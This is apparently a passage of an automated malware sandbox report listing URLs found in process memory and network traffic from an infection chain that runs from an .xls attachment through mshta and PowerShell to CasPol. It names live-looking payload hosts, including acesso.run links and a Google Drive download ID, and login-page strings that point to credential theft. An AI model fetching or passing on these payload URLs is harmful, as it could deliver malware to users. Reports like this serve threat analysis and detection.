          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
          Source: powershell.exe, 00000005.00000002.426757676.0000000002091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.480727505.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.477548914.0000000001F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
          Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
          Source: CasPol.exe, 0000002A.00000002.502030748.000000000018C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/k
          Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
          Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://www.msn.com/
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: CasPol.exe, 0000001F.00000002.512443413.00000000003A4000.00000004.00000010.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.519745743.00000000001AF000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
          Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413123057.0000000003620000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/
          Source: mshta.exe, 00000004.00000002.413123057.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/)
          Source: mshta.exe, 00000010.00000002.463992817.000000000037E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.000000000037E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp, A & C Metrology OC 545714677889Materiale.xls, 7B130000.0.drString found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain
          Source: mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain-v
          Source: mshta.exe, 00000004.00000002.412317283.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406433145.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainD4
          Source: mshta.exe, 00000004.00000002.412282901.000000000010A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainG4
          Source: mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainI
          Source: mshta.exe, 00000004.00000003.406433145.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainJ4
          Source: mshta.exe, 00000004.00000002.412282901.000000000010A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainZ4
          Source: mshta.exe, 00000010.00000002.463967670.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainyX
          Source: mshta.exe, 00000004.00000003.406433145.000000000017E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain~4
          Source: mshta.exe, 00000010.00000002.463967670.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/O
          Source: mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/d
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/koE
          Source: mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/p
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://contextual.media.net/
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
          Source: bhv417.tmp.31.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: powershell.exe, 0000000F.00000002.480727505.0000000002552000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
          Source: powershell.exe, 0000001B.00000002.531067670.0000000002542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
          Source: powershell.exe, 0000000F.00000002.480727505.0000000002717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
          Source: powershell.exe, 0000000F.00000002.480727505.0000000002717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
          Source: bhv417.tmp.31.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
          Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
          Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
          Source: CasPol.exe, 0000001F.00000002.516164879.000000000216A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.516435437.000000000220A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.523035849.0000000002159000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.523294829.00000000021FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
          Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
          Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
          Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49161 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49171 version: TLS 1.2
